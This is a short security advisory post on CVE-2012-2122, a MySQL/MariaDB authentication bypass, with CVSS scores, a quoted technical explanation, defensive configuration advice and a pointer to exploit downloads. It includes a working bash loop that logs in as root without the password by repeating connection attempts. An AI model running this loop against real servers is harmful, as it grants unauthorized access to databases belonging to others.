5.1 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:H/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.7%
CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability
A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.
โWhen a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it mightโvehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256.โ
โWhich means, if one knows a user name to connect (and โrootโ almostalways exists), she can connect using any password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, thereโs no need for a special libmysqlclient library.โ
The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in seq 1 1000
; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql>
**Defense:**The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.
the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the โbind-addressโ parameter to โ127.0.0.1โ. Restart the MySQL service to apply this setting.
Note: Download The Latest Exploits forCVE-2012-2122 From ourTOOLS YARD section.